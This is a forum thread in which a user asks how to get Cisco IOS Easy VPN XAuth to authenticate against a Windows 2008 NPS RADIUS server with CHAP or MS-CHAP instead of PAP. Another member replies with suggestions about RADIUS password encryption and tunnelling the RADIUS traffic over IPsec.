|
timmi
7 posts
 |
hello everybody i want to get an easy vpn (sdm) implementation running with an ike xauth that contacts an external radius server for authentication (win2k8 server which runs network policy server (NPS), before win2k8 NPS was called IAS). the only way the user authentication works is with pap (cleartext username/password). i've found a thread that describes this problem as well: https://supportforums.cisco.com/message/3044412;jsessionid=58789B4147D83BCE32B09982EB425375.node0 but i don't have an ASA, i have a simple 2850 with a standard IOS where i can't execute the tunnel-group or password-management command descried here: http://www.cisco.com/en/US/docs/security/asa/asa80/command/reference/p.html#wp1879916 i want to use CHAP oder MSCHAP or MSCHAPv2... anything... but not PAP! how could i get it to work without an ASA IOS? hope anyone could help with this specific problem. greetings timmi |
|
timmi
7 posts
|
does nobody have an idea for this problem? |
|
joshlowe
101 posts
 |
I'm not sure that it's possible to use anything but PAP on the routers (unless you're doing PPP authentication). Have you considered setting up an encrypted tunnel between the router and the RADIUS server? Even if you're using PAP, the entire RADIUS packet would be encrypted anyway. |
|
joshlowe
101 posts
|
Actually, now that I think about it a little more, RADIUS encrypts the passwords regardless of whether it's PAP, CHAP, MS-CHAPv2, etc. Unfortunatly that's all it encrypts (whereas TACACS+ will encrypt the entire payload). However, my previous comment about IPSec between the router and RADIUS still applies if you feel like the MD5 hash of the PAP password is not enough, or you want to encrypt the other (sometimes sensitive) information in the RADIUS packet. |
|
timmi
7 posts
|
It's just an md5 hash of the pwd? I think that's not enough in todays times. I'm really wondering if pap would be the only way of authentication with a radius server. Mhhhhh. :-\ |
Viewing 1 - 5 of 5
- 1